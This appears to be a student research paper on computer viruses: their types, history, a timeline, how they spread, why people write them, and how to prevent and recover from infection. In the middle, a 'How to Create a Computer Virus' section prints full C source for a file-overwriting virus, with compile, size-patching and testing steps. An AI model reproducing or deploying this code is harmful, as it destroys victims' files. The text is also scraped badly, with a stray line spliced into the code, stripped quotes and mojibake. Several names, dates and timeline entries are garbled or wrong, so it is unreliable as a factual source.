Background Of Studies On Computer Viruses

Background Of Studies On Computer Viruses A computer virus is a computer program that can copy itself and infect a computer. The term virus is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer. As stated above, the term computer virus is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most root kits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer systems data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to them. Some viruses do nothing beyond reproducing themselves. Section 1.2 Background of Studies on Various Computer Viruses Boot Sector Viruses This type of viruses has ability to hide in boot sector. The viruses will load into memory when there is booting system and trying to read from hard disk. Boot sector viruses are more spread since old time when floppy disk was popular. But now we hardly seen them since many of them only can spread through floppy disk. This type of virus affects the boot sector of a floppy or hard disk. This is a crucial part of a disk, in which information on the disk itself is stored together with a program that makes it possible to boot (start) the computer from the disk. The best way of avoiding boot viruses is to ensure that floppy disks are write-protected and never start your computer with an unknown floppy disk in the disk drive. Examples of boot viruses include: Polyboot.B, AntiEXE. Companion Viruses Companion Viruses is another kind of viruses. When user computer infect by this sort of viruses, it will create another type file from an existing file in same directory (such as creating file.com from file.exe in the same folder), some companion viruses create file.exe from any folder. It can be considered file infector viruses like resident or direct action types. They are known as companion viruses because once they get into the system they accompany the other files that already exist. In other words, in order to carry out their infection routines, companion viruses can wait in memory until a program is run (resident viruses) or act immediately by making copies of themselves (direct action viruses). Some examples include: Stator, Asimov.1539, and Terrax.1069 Encrypted Viruses This type of viruses consists of encrypted malicious code, decrypted module. The viruses use encrypted code technique which make antivirus software hardly to detect them. The antivirus program usually can detect this type of viruses when they try spread by decrypted themselves. Logic Bomb Viruses Logic Bomb Viruses or sometime know as Time Bomb is small piece of malicious code or program which have ability to insert itself to other programs or system and perform specific action when the conditions are met (most Logic Bomb developers use date as conditions). The Logic Bomb does nothing until pre-programmed date is reached. Logic Bomb can perform any malicious things based on pre-programmed within it such as deleting file or displaying unwanted message or lock program and so on. They are not considered viruses because they do not replicate. They are not even programs in their own right but rather camouflaged segments of other programs. Their objective is to destroy data on the computer once certain conditions have been met. Logic bombs go undetected until launched, and the results can be destructive. Macro Viruses When talking about Macro Viruses, we refer to viruses which infect macro of other applications such as Microsoft Word, Microsoft Excel. The viruses are written in a macro language and use it to distribute themselves. Macro viruses will run automatically when user open document. Usually this type of virus cause harmless to your computer, but instead they are annoying by automatically inserting undesired texts or symbols. Example of Macro Virus: WM.Concept, it was introduced in 1995 the first macro virus that spread through Microsoft Word. And another popular one is Melissa that is first found in 1999, it also can spread through MS Word, Excel and Outlook. Multipartite Viruses Multipartite Viruses is type of viruses which infect user computer on both part boot sector and executable files and programs at the same time, with this condition, the viruses spread faster than boot sector or file infector alone. It changes the paths that indicate the location of a file. By executing a program (file with the extension .EXE or .COM) which has been infected by a virus, you are unknowingly running the virus program, while the original file and program have been previously moved by the virus. Once infected it becomes impossible to locate the original files Example: Ghost ball, the first multipartite virus. Nonresident Viruses This type of viruses is similar to Resident Viruses by using replication of module. Besides that, Nonresident Viruses role as finder module which can infect to files when it found one (it will select one or more files to infect each time the module is executed). Polymorphic Viruses: Polymorphic Virus is similar to encrypted viruses; it can infect files with an encrypted copy of itself. The viruses use difference technique to replicate themselves. Some polymorphic viruses are hardly to detect by antivirus software using virus signature based, because it do not remain any identical after replication. Polymorphic viruses encrypt or encode themselves in a different way (using different algorithms and encryption keys) every time they infect a system. This makes it impossible for anti-viruses to find them using string or signature searches (because they are different in each encryption) and also enables them to create a large number of copies of themselves. Examples include: Elkern, Marburg, Satan Bug, and Tuareg. Resident Viruses Resident Viruses or known as Memory Resident Viruses is malicious module. The viruses can replicate module and installing malicious code into computer memory (RAM). The viruses are commonly classified into two main categories: Fast Infectors and Slow Infectors. This type of virus is a permanent which dwells in the RAM memory. From there it can overcome and interrupt all of the operations executed by the system: corrupting files and programs that are opened, closed, copied, renamed etc. Examples include: Randex, CMJ, Meve, and MrKlunky. Stealth Viruses / Worm Stealth Viruses is some sort of viruses which try to trick anti-virus software by intercepting its requests to the operating system. It has ability to hide itself from some antivirus software programs. Therefore, some antivirus program cannot detect them. A worm is a program very similar to a virus; it has the ability to self-replicate, and can lead to negative effects on your system and most importantly they are detected and eliminated by antivirus. Examples of worms include: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, and Mapson. Section 1.3.1 Research Question 1. How did the diff. types of computer Viruses Created when, where, by whom? 2. How are they attack/work on the end user computers? 3. How we protect ourself from such type of computer viruses? 4. What will be the future trend of computer viruses? Section 1.3.2 Research Aim The research aims at understanding how Computer viruses is evolving and attacking on day to day computer business Section 1.3.3 Research Objective The objective of this research is to help to the User of Computer to make decisions on the how to solved the problem created because of computer viruses from a long time perspectives.Also to develop contrasting measure between the creator of computer viruses and the end user of the computer. Section 1.3.4 Research Hypothesis Many of the viruses that have had the greatest impact have been intended to be totally benign. Unfortunately, small errors in program code have led to disastrous results. The most frequent such error is when a virus program, which was intended to infect a computer only once, doesnt realize it has already done its job, and keeps infecting the computer over and over. This was the problem with the infamous virus released at Cornell University on November 2, 1988, by Robert Morris, Jr., which rapidly brought the entire Internet system of computers to its knees. Where the small drain of a single virus can pass unnoticed by a computer system, millions of viruses can fill every bit of memory and use up every cycle of computing power of the computer they have invaded. The hidden message revealed by the widely publicized cases of infection by computer viruses is that existing computer systems of all sorts could be making very large errors that have never been recognized. This means the computer systems that take care of every aspect of the worlds financial life, computer systems that keep personal records on you and me, computer systems that support the military capabilities of the super-powers. Good system developers test systems thoroughly before installation, attempting to test every possible logic path. However, with a system of any reasonable level of complexity, this is an impossible task, so a major system is likely only to have been thoroughly tested for frequently occurring events. Its the infrequently occurring events, and especially the unforeseen combinations of events, that are the bane of systems developers. And those are also the areas where Poincares admonition is most likely to come into play. Chapter 2 Literature Review What is Computer virus? Term was first used by Fred Cohen in 1984. A computer virus is a small program a computer virus is a computer program that can copy itself and infect a computer. The term virus is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer. As stated above, the term computer virus is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most root kits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer systems data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to them. Some viruses do nothing beyond reproducing themselves History of Computer viruses The first academic work on the theory of computer viruses (although the term computer virus was not invented at that time) was done by John von Neumann in 1949 that held lectures at the University of Illinois about the Theory and Organization of Complicated Automata. The work of von Neumann was later published as the Theory of self-reproducing automata In his essay von Neumann postulated that a computer program could reproduce. In 1972 Veith Risak published his article Selbstreproduzierende Automaton mitt minimaler Informationsà ¼bertragung (Self-reproducing automata with minimal information exchange). The article describes a fully functional virus written in assembler language for a SIEMENS 4004/35 computer system. In 1984 Fred Cohen from the University of Southern California wrote his paper Computer Viruses Theory and Experiments It was the first paper to explicitly call a self-reproducing program a virus; a term introduced by his mentor Leonard Adelman. An article that describes useful virus functionalities was published by J. B. Gunn under the title Use of virus functions to provide a virtual APL interpreter under user control in 1984. Science Fiction The Terminal Man, a science fiction novel by Michael Crichton (1972), told (as a sideline story) of a computer with telephone modem dialing capability, which had been programmed to randomly dial phone numbers until it hit a modem that is answered by another computer. It then attempted to program the answering computer with its own program, so that the second computer would also begin dialing random numbers, in search of yet another computer to program. The program is assumed to spread exponentially through susceptible computers. The actual term virus was first used in David Gerrolds 1972 novel, When HARLIE Was One. In that novel, a sentient computer named HARLIE writes viral software to retrieve damaging personal information from other computers to blackmail the man who wants to turn him off. Virus programs History The Creeper virus was first detected on ARPANET, the forerunner of the Internet, in the early 1970s. Creeper was an experimental self-replicating program written by Bob Thomas at BBN Technologies in 1977 Creeper used the ARPANET to infect DEC PDP-10 computers running the TENEX operating system. Creeper gained access via the ARPANET and copied itself to the remote system where the message, Im the creeper, catch me if you can! was displayed. The Reaper program was created to delete Creeper. A program called Elk Cloner was the first computer virus to appear in the wild that is, outside the single computer or lab where it was created. Written in 1981 by Richard Skeena, it attached itself to the Apple DOS 3.3 operating system and spread via floppy disk. This virus, created as a practical joke when Skeena was still in high school, was injected in a game on a floppy disk. On its 50th use the Elk Cloner virus would be activated, infecting the computer and displaying a short poem beginning Elk Cloner: The program with a personality. The first PC virus in the wild was a boot sector virus dubbed (c) Brain, created in 1986 by the Farooq Alvin Brothers in Lahore, Pakistan, reportedly to deter piracy of the software they had written. Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk, usually inadvertently. PCs of the era would attempt to boot first from a floppy if one had been left in the drive. Until floppy disks fell out of use, this was the most successful infection strategy and boot sector viruses were the most common in the wild for many years. Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase in BBS, modem use, and software sharing. Bulletin board-driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Macro viruses have become common since the mid-1990s. Most of these viruses are written in the scripting languages for Microsoft programs such as Word and Excel and spread throughout Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most could also spread to Macintosh computers. Although most of these viruses did not have the ability to send infected e-mail, those viruses which did take advantage of the Microsoft Outlook COM interface. Some old versions of Microsoft Word allow macros to replicate themselves with additional blank lines. If two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a mating of the two and would likely be detected as a virus unique from the parents. A virus may also send a web address link as an instant message to all the contacts on an infected machine. If the recipient, thinking the link is from a friend (a trusted source) follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating. Viruses that spread using cross-site scripting were first reported in 2002, and were academically demonstrated in 2005. There have been multiple instances of the cross-site scripting viruses in the wild, exploiting websites such as MySpace and Yahoo. Time line of computer viruses: In the early years floppy disks (removable media) were in fact the in the late 80s. Ultimately of course, the internet in all its forms became the major source of infection. YEAR VIRUS NAME BY WHOM TYPE 1982 ELK CLONER RICH SKRENTA 1983 COMPUTER VIRUS FRED COHEN 1986 BRAIN PAKISTAN BOOT SECTOR 1988 ARPANET ROBBERT MORRIS ENCRYPTED 1989 AIDS TROJAN 1990 ANTI-VIRUS S/W 1991 NON-ANTI S/W SYMANTEC POLYMORPHIC 1994 HOAX 1995 WORD 1999 MELLISA DAVID L. SMITH 2000 I LOVE U FILIPINE STUDENT 2001 CODE RED WORM 2003 SLAMMER 2004 MY DOON/NOVARG 2005 COMMWARRIOR-A RUSSIA CELL PHONE 2008 CONFICKER 2009 CYNER ATTACK W32.DOZOR 2010 STUNEXT TROJAN 2011 HTTP BOT BLACK SHADES Programming language used for creating Computer Viruses: C C++ Assembler PHP JAVA SCRIPT VB SCRIPT MICRO LANGUAGE/CODE How Computer Viruses Work As youll see in the next section, the term virus was applied to this type of software very early in its history. Its an apt metaphor, because a computer virus is, in many ways, similar to the biological Viruses that attack human bodies. A biological virus isnt truly a living, independent entity; as biologists will tell you, a virus is nothing more than a fragment of DNA sheathed in a protective jacket. It reproduces by injecting its DNA into a host cell. The DNA then uses the host cells normal mechanisms to reproduce itself. A computer virus is like a biological virus in that it also isnt an independent entity; it must Piggyback on a host (another program or document) in order to propagate. How a virus infects your computer 1. Virus program is launched. 2. Virus code is loaded into PC memory. 3. Virus delivers its destructive payload. 4. Virus copies itself to other programs. How Computer Viruses Work 5 If all a virus did was copy itself to additional programs and computers, there would be little Harm done, save for having all our programs get slightly larger (thanks to the virus code). Unfortunately, most viruses not only replicate themselves, they also perform other operations-many of which are wholly destructive. A virus might, for example, delete certain files on your computer. It might overwrite the boot sector of your hard disk, making the disk inaccessible. It might write Messages on your screen, or cause your system to emit rude noises. It might also hijack your E-mail program and use the program to send it to all your friends and colleagues, thus replicating itself to a large number of PCs. Viruses that replicate themselves via e-mail or over a computer network cause the subsidiary Problem of increasing the amount of Internet and network traffic. These fast-replicating viruses Called worms can completely overload a company network, shutting down servers and forcing ten s of thousands of users offline. While no individual machines might be damaged, this type of Communications disruption can be quite costly. As you might suspect, most viruses are designed to deliver their payload when theyre first executed. However, some viruses wont attack until specifically prompted, typically on a predetermined Date or day of the week. They stay on your system, hidden from sight like a sleeper Agent in a spy novel, until theyre awoken on a specific date; then they go about the work them were programmed to do. In short, viruses are nasty little bits of computer code, designed to inflict as much damage As possible, and to spread to as many computers as possible-a particularly vicious combination. How to Create a Computer Virus? This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Heres the source code of the virus program. #include #include #include #include #include #include FILE *virus,*host; int done, a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(*.*,ffblk,0); while(!done) { virus=fopen(_argv[0],r3. Virus delivers its destructive payload. b); host=fopen(ffblk.ff_name,rb+); if(host==NULL) goto next; x=89088; printf(Infecting %sn,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048; } fread(buff,x,1,virus); fwrite(buff,x,1,host); a++; next: { fcloseall(); done=findnext(ffblk); } } printf(DONE! (Total Files Infected= %d),a); end=clock(); printf(TIME TAKEN=%f SECn, (end-st)/CLK_TCK); getch(); } COMPILING METHOD: USING BORLAND TC++ 3.0 (16-BIT): 1. Load the program in the compiler, press Alt-F9 to compile 2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER) 3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR ITS SIZE) 4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT) 5. Once again follow the STEP 1 STEP 2.Now the generated EXE File is ready to infect USING BORLAND C++ 5.5 (32-BIT) : 1. Compile once, note down the generated EXE file length in bytes 2. Change the value of X in source code to this length in bytes 3. Recompile it. The new EXE file is ready to infect HOW TO TEST: 1. Open new empty folder 2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH PASTING IN THE NEW FOLDER) 3. Run the virus EXE file there you will see all the files in the current directory get infected. 4. All the infected files will be ready to re-infect. Why Viruses Exist Computer viruses, unlike biological viruses, dont spring up out of now here-theyre created. By people. And the people-programmers and developers, typically-who create computer viruses Know what theyre doing. These code writers deliberately create programs that they know will Wreak havoc on huge numbers of computer users. The question is why? It takes some degree of technical skill to create a virus. To that end, creating a computer Virus is no different than creating any other computer application. Any computer programmer or Developer with a minimal amount of skill can create a virus-all it takes is knowledge of a programming Language, such as C, Visual Basic, or Java, or a macro language, such as VBA. By using a build your own virus program-of which there are several available, Via the Internet underground. So, by definition, a virus writer is a person with a certain amount of technical expertise. But Instead of using that expertise productively, virus writers use it to generate indiscriminate mayhem among other computer users. This havoc-wreaking is, in almost all instances, deliberate. Virus writers intend to be destructive. They get some sort of kick out of causing as much damage as possible, from the relative Anonymity of their computer keyboards. Understanding Computer Viruses In addition, some developers create viruses to prove their technical prowess. Among certain Developers, writing a successful virus provides a kind of bragging right, and demonstrates, in some warped fashion, that the writer is especially skilled. Unfortunately, the one attribute that virus writers apparently lack is ethical sense. Virus programs can be enormously destructive, and it takes a peculiar lack of ethics to deliberately perpetrate such destruction on such a wide scale. In the end, a virus writer is no better than a common vandal. Except for the technical expertise required, the difference between throwing a rock through a window and destroying PC files via a virus is minimal. Some people find pleasure in destruction, and in our high-tech age, such Pleasure can come from writing destructive virus code. What You Can Do About Computer Viruses Theres very little you can do, on a personal level, to discourage those high-tech vandals who create Virus programs. There are plenty of laws already on the books that can be used to prosecute these criminals, and such criminal investigations-and prosecutions-have become more common in recent years. However, as with most criminal activity, the presence of laws doesnt always mean there are fewer criminals; the truth is, theres a new batch of virus writers coming online every day. All of which means that you cant rely on anyone else to protect you from these virus-writing Criminals. Ultimately, you have to protect yourself. Reducing Your Chances of Infection To make yourself less of a target for virus infection, take the following steps: Restrict your file downloading to known or secure sources. The surest way to catch a virus is to download an unknown file from an unknown site; try not to put you at risk like this unless you absolutely have to. Dont open any e-mail attachments you werent expecting. The majority of viruses today arrive in your mailbox as attachments to e-mail messages; resist the temptation to open or view every file attachment you receive. Use an up-to-date anti-virus program or service. Antivirus programs work; they scan the files on your computer (as well as new files you download and e-mail messages you receive) and check for any previously identified viruses. Theyre a good first line of defence, As long as you keep the programs up-to-date with information about the very latest viruses and most antivirus programs make it easy to download updates. Enable macro virus protection in all your applications. Most current Microsoft Applications include special features that keep the program from running unknown macros and thus prevent your system from being infected by macro viruses. Create backup copies of all your important data. If worse comes to worst and your Entire system is infected; you may need to revert to no infected versions of your most critical Files. You cant do this unless you plan ahead and back up your important data. Preventing Viruses Attacks. Diagnosing a Virus Infection How do you know if your computer has been infected with a virus? In short, if it starts acting Funny-doing anything it didnt do before-then a probable cause is some sort of computer Virus. Here are some symptoms to watch for: à ¢Ã¢â€š ¬Ã‚ ¢ Programs quit working or freeze up. à ¢Ã¢â€š ¬Ã‚ ¢ Documents become inaccessible. à ¢Ã¢â€š ¬Ã‚ ¢ Computer freezes up or wont start properly. à ¢Ã¢â€š ¬Ã‚ ¢ The CAPS LOCK key quits working-or works intermittently. à ¢Ã¢â€š ¬Ã‚ ¢ Files increase in size. à ¢Ã¢â€š ¬Ã‚ ¢ Frequent error messages appear onscreen. à ¢Ã¢â€š ¬Ã‚ ¢ Strange messages or pictures appear onscreen. à ¢Ã¢â€š ¬Ã‚ ¢ Your PC emits strange sounds. à ¢Ã¢â€š ¬Ã‚ ¢ Friends and colleagues inform you that theyve received strange e-mails from you, that you dont remember sending. How to Catch a Virus. Recovering from a Virus Attack If youre unfortunate enough to be the victim of a virus attack, your options narrow. You have to find the infected files on your computer, and then either dies-infects them (by removing the virus Code) or delete them-hopefully before the virus has done any permanent damage to your system. You dont, however, have to give up and throw your computer away. Almost all viruses can be recovered from-some quite easily. All you need is a little information, and the right tools. The right tools include one of the major antivirus programs discussed in Anti-Virus Software and Services. These programs-such as Norton Antivirus